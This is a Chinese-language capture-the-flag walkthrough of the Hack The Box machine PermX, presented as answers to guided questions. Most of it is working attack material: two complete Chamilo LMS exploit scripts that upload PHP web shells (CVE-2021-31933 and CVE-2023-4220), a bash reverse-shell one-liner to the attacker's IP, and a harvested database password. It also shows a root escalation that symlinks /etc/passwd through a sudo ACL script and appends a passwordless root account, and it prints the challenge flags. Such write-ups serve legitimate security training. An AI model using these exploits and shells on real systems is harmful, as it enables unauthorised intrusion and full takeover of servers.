目录
[1.How many TCP ports are listening on PermX?](#1.How many TCP ports are listening on PermX?)
[2.What is the default domain name used by the web server on the box?](#2.What is the default domain name used by the web server on the box?)
[3.On what subdomain of permx.htb is there an online learning platform?](#3.On what subdomain of permx.htb is there an online learning platform?)
[4.What is the name of the application running on `lms.permx.htb?](#4.What is the name of the application running on `lms.permx.htb?)
[5.What version of Chamilo is running on PermX?](#5.What version of Chamilo is running on PermX?)
[6.What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?](#6.What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?)
[7.What user is the webserver running as on PermX?](#7.What user is the webserver running as on PermX?)
[8.What is the full path to the file that holds configuration data to include the database connection information for Chamilo?](#8.What is the full path to the file that holds configuration data to include the database connection information for Chamilo?)
[9.Submit the flag located in the mtz user's home directory.](#9.Submit the flag located in the mtz user's home directory.)
USER_FLAG:7239022c6248c28ed2945734c9e07ac9
[10.What is the full path to the script that the mtz user can run as any user without a password?](#10.What is the full path to the script that the mtz user can run as any user without a password?)
[11./opt/acl.sh allow for changing the access control list on file in what directory? (Don't include the trailing / on the directory.)](#11./opt/acl.sh allow for changing the access control list on file in what directory? (Don't include the trailing / on the directory.))
[12.Does setfacl follow symbolic links by default?(YES)](#12.Does setfacl follow symbolic links by default?(YES))
[13.Submit the flag located in the root user's home directory.](#13.Submit the flag located in the root user's home directory.)
ROOT_FLAG:86f2867102ba7ec4855205a4f2096539
连接至HTB服务器并启动靶机
靶机IP:10.10.11.23
分配IP:10.10.14.12
1.How many TCP ports are listening on PermX?
使用nmap对靶机TCP端口进行开放扫描
nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.11.23
由扫描结果可见,靶机开放端口:22、80共2个端口
2.What is the default domain name used by the web server on the box?
使用curl访问靶机80端口
curl -I 10.10.11.23:80
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I 10.10.11.23:80
HTTP/1.1 302 Found
Date: Mon, 04 Nov 2024 00:32:59 GMT
Server: Apache/2.4.52 (Ubuntu)
Location: http://permx.htb
Content-Type: text/html; charset=iso-8859-1
由输出可见,直接访问靶机IP将被重定位至:permx.htb
3.On what subdomain of permx.htb
is there an online learning platform?
将靶机IP与域名进行绑定
echo '10.10.11.23 permx.htb' >> /etc/hosts
使用ffuf对该域名进行子域名FUZZ
ffuf -u http://permx.htb -H 'Host: FUZZ.permx.htb' -w ../dictionary/subdomains-top1mil-5000.txt -fc 302
再次将靶机IP与该子域进行绑定
echo '10.10.11.23 lms.permx.htb' >> /etc/hosts
使用浏览器直接访问该子域
搜索Chamilo ,可见该子域:lms.permx.htb托管一个在线学习平台
4.What is the name of the application running on `lms.permx.htb?
使用Wappalyzer查看该网站技术栈
可见该页面所用WebAPP为:Chamilo(CMS)
5.What version of Chamilo is running on PermX?
使用ffuf对子域进行路径FUZZ
ffuf -u http://lms.permx.htb/FUZZ -w ../dictionary/common.txt
使用浏览器访问子域下robots.txt文件
进入documentation目录下
由该页面标题可见,该CMS版本为:1.11
6.What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?
对该CMS进行漏洞搜索
searchsploit Chamilo
将RCE相关的EXP拷贝到当前目录下
searchsploit -m 49867.py
查看该EXP代码
cat 49867.py
# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)
# Date: 13/05/2021
# Exploit Author: M. Cory Billington (@_th3y)
# Vendor Homepage: https://chamilo.org
# Software Link: https://github.com/chamilo/chamilo-lms
# Version: 1.11.14
# Tested on: Ubuntu 20.04.2 LTS
# CVE: CVE-2021-31933
# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/
from requests import Session
from random import choice
from string import ascii_lowercase
import requests
# This is all configuration stuff,
url = "http://127.0.0.1/chamilo-lms/" # URL to remote host web root
user_name = "admin" # User must be an administrator
password = "admin"
command = "id;whoami"
# Where you want to upload your webshell. Must be writable by web server user.
# This spot isn't protectec by .htaccess
webshell_path = 'web/'
webshell_name = f"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar" # Just a random name for webshell file
content = f"<?php echo `{command}`; ?>"
def main():
# Run a context manager with a session object to hold login session after login
with Session() as s:
login_url = f"{url}index.php"
login_data = {
"login": user_name,
"password": password
}
r = s.post(login_url, data=login_data) # login request
# Check to see if login as admin user was successful.
if "admin" not in r.url:
print(f"[-] Login as {user_name} failed. Need to be admin")
return
print(f"[+] Logged in as {user_name}")
print(f"[+] Cookie: {s.cookies}")
file_upload_url = f"{url}main/upload/upload.php"
# The 'curdirpath' is not santitized, so I traverse to the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as well
php_webshell_file = {
"curdirpath": (None, f"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}"),
"user_upload": (webshell_name, content)
}
## Good command if you want to see what the request looks like without sending
# print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))
# Two requests required to actually upload the file
for i in range(2):
s.post(file_upload_url, files=php_webshell_file)
exploit_request_url = f"{url}{webshell_path}{webshell_name}"
print("[+] Upload complete!")
print(f"[+] Webshell: {exploit_request_url}")
# This is a GET request to the new webshell to trigger code execution
command_output = s.get(exploit_request_url)
print("[+] Command output:\n")
print(command_output.text)
if __name__ == "__main__":
main()
由该EXP注释可知,该EXP基于漏洞:CVE-2021-31933。好像并不是我们要找的2023漏洞
启动Metasploit
msfconsole
搜索Chamilo相关模块
search Chamilo
可见该漏洞模块无需认证可直接代码注入导致RCE,切换至该模块
use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960
查看该模块信息
info
从模块描述可见,该模块基于漏洞:CVE-2023-34960
往上一填,发现答案居然不对,才发现是要找存储型XSS漏洞
进入CVE.MITRE.ORG网站搜索该CMS相关漏洞
对stored cross-site进行搜索
该漏洞允许无认证文件执行JS脚本与上传Webshell:CVE-2023-4220
7.What user is the webserver running as on PermX?
我这边直接到Github上寻找该漏洞相关EXP
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Name : CVE-2023-4220
# Autor : Insomnia (Jacob S.)
# IG : insomnia.py
# X : @insomniadev_
# Yt : insomnia-dev
# Github : https://github.com/insomnia-jacob
# Description: Automation of RCE in Chamilo LMS on affected versions of CVE-2023-4220 through a web shell
import argparse
import requests
import time
from os import system
import io
# Colors
red = '\033[31m'
green = '\033[32m'
blue = '\033[34m'
yellow = '\033[93m'
reset = '\033[0m'
def arguments():
global args
parser = argparse.ArgumentParser()
parser.add_argument( '-t', '--target', required=True ,help='Enter the target domain, for example: http://example.com' )
args = parser.parse_args()
def check_url_exists(url):
print(blue,'\n\n[+]', reset, 'Checking if it is vulnerable.')
try:
response = requests.head(url + '/main/inc/lib/javascript/bigupload/files', allow_redirects=True)
if response.status_code == 200:
is_vuln()
try:
response2 = requests.head(url + '/main/inc/lib/javascript/bigupload/files/insomnia.php', allow_redirects=True)
if response2.status_code == 200:
print(f'Success! open in browser: {url}/main/inc/lib/javascript/bigupload/files/insomnia.php')
else:
upload_file(args.target)
except requests.RequestException as e:
print(red,f"[x] Error checking the URL: {e}")
return False
else:
print(f'Error {url}')
except requests.RequestException as e:
print(red,f"[x] Error checking the URL: {e}")
return False
def upload_file(url):
new_url = url + '/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
insomnia_php = """
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
"""
file_like_object = io.BytesIO(insomnia_php.encode('utf-8'))
file_like_object.name = 'insomnia.php'
files = {'bigUploadFile': file_like_object}
response3 = requests.post(new_url, files=files)
print(response3.status_code)
print(f'Success! open in browser: {url}/main/inc/lib/javascript/bigupload/files/insomnia.php')
def is_vuln():
print(red,'''
███████████████████████████
███████▀▀▀░░░░░░░▀▀▀███████
████▀░░░░░░░░░░░░░░░░░▀████
███│░░░░░░░░░░░░░░░░░░░│███
██▌│░░░░░░░░░░░░░░░░░░░│▐██
██░└┐░░░░░░░░░░░░░░░░░┌┘░██
██░░└┐░░░░░░░░░░░░░░░┌┘░░██ [*] "It is vulnerable!"
██░░┌┘▄▄▄▄▄░░░░░▄▄▄▄▄└┐░░██
██▌░│██████▌░░░▐██████│░▐██ [*] "It is vulnerable!"
███░│▐███▀▀░░▄░░▀▀███▌│░███
██▀─┘░░░░░░░▐█▌░░░░░░░└─▀██ [*] "It is vulnerable!"
██▄░░░▄▄▄▓░░▀█▀░░▓▄▄▄░░░▄██
████▄─┘██▌░░░░░░░▐██└─▄████ [*] "It is vulnerable!"
█████░░▐█─┬┬┬┬┬┬┬─█▌░░█████
████▌░░░▀┬┼┼┼┼┼┼┼┬▀░░░▐████
█████▄░░░└┴┴┴┴┴┴┴┘░░░▄█████
███████▄░░░░░░░░░░░▄███████
██████████▄▄▄▄▄▄▄██████████
███████████████████████████
''', reset)
def target(url):
print(blue ,f' URL: {url}')
time.sleep(3)
system("clear")
def banner():
textBanner = rf"""
/ __)/ )( \( __)___(___ \ / \(___ \( __ \ ___ / _ \(___ \(___ \ / \
( (__ \ \/ / ) _)(___)/ __/( 0 )/ __/ (__ ((___)(__ ( / __/ / __/( 0 )
\___) \__/ (____) (____) \__/(____)(____/ (__/(____)(____) \__/
"""
print(green,textBanner)
print(yellow,' by Insomnia (Jacob S.)')
def main():
arguments()
banner()
target(args.target)
check_url_exists(args.target)
if __name__ == '__main__':
main()
直接使用该EXP开始漏洞利用
python exploit.py -t http://lms.permx.htb/
直接访问EXP提供的URL,执行whoami命令
由回显可见,当前用户为:www-data
8.What is the full path to the file that holds configuration data to include the database connection information for Chamilo?
本地侧使用nc开始监听
nc -lvnp 1425
通过EXP提供的Webshell反弹shell
bash -c 'bash -i >& /dev/tcp/10.10.14.12/1425 0>&1'
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.23] 53550
bash: cannot set terminal process group (1173): Inappropriate ioctl for device
bash: no job control in this shell
www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$ whoami
<ilo/main/inc/lib/javascript/bigupload/files$ whoami
www-data
提升TTY
script -c /bin/bash -q /dev/null
搜索WebAPP下所有可能的配置相关文件并输出为列表
find /var/www/chamilo -name 'conf*' -type f 2>/dev/null | tee res.txt
逐个查看文件内容,并匹配'password'字段
cat res.txt | xargs -I {} sh -c 'cat {} | grep "password"'
查询该字段出处:03F6lY3uXAP2bkW8
xargs -I {} sh -c 'grep -m1 "03F6lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt
www-data@permx:/var/www/chamilo$ xargs -I {} sh -c 'grep -m1 "03F6lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt
<lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
Found in /var/www/chamilo/app/config/configuration.php
从该文件中找出匹配字符串并输出上下5行
grep -C 5 '03F6lY3uXAP2bkW8' /var/www/chamilo/app/config/configuration.php
www-data@permx:/var/www/chamilo$ grep -C 5 '03F6lY3uXAP2bkW8' /var/www/chamilo/app/config/configuration.php
<bkW8' /var/www/chamilo/app/config/configuration.php
// Database connection settings.
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Enable access to database management for platform admins.
$_configuration['db_manager_enabled'] = false;
/**
* Directory settings.
账户:chamilo密码:03F6lY3uXAP2bkW8
总结一下,该文件存储着数据库连接信息:/var/www/chamilo/app/config/configuration.php
9.Submit the flag located in the mtz user's home directory.
查看靶机支持登录的用户
cat /etc/passwd
尝试使用该用户对靶机进行SSH服务登录
ssh mtz@10.10.11.23
查询user_flag位置并查看其内容
mtz@permx:~$ find / -name 'user.txt' 2>/dev/null
/home/mtz/user.txt
mtz@permx:~$ cat /home/mtz/user.txt
7239022c6248c28ed2945734c9e07ac9
USER_FLAG:7239022c6248c28ed2945734c9e07ac9
10.What is the full path to the script that the mtz user can run as any user without a password?
查看该用户可无密码特权运行的命令
sudo -l
mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User mtz may run the following commands on permx:
(ALL : ALL) NOPASSWD: /opt/acl.sh
存在文件可无密码特权运行:/opt/acl.sh
11./opt/acl.sh
allow for changing the access control list on file in what directory? (Don't include the trailing /
on the directory.)
通过脚本内容可知,该脚本运行后允许在**/home/mtz**目录下赋任意链接任意权限
12.Does setfacl
follow symbolic links by default?(YES)
13.Submit the flag located in the root user's home directory.
尝试创建连接test ,连接至**/etc/passwd**
ln -s /etc/passwd /home/mtz/test
通过**/opt/acl.sh** 脚本为**/home/mtz/test**链接赋读写权限
sudo /opt/acl.sh mtz rw /home/mtz/test
mtz@permx:~$ ln -s /etc/passwd /home/mtz/test
mtz@permx:~$ ls
priv test user.txt
mtz@permx:~$ sudo /opt/acl.sh mtz rw /home/mtz/test
往**/home/mtz/test**链接中写入新用户
echo '0dayhp::0:0:0dayhp:/root:/bin/bash' >> /home/mtz/test
切换到0dayhp用户bash
su 0dayhp
查找root_flag位置并查看其内容
root@permx:/home/mtz# find / -name 'root.txt'
/root/root.txt
/var/www/chamilo/vendor/symfony/intl/Tests/Data/Bundle/Reader/Fixtures/txt/root.txt
root@permx:/home/mtz# cat /root/root.txt
86f2867102ba7ec4855205a4f2096539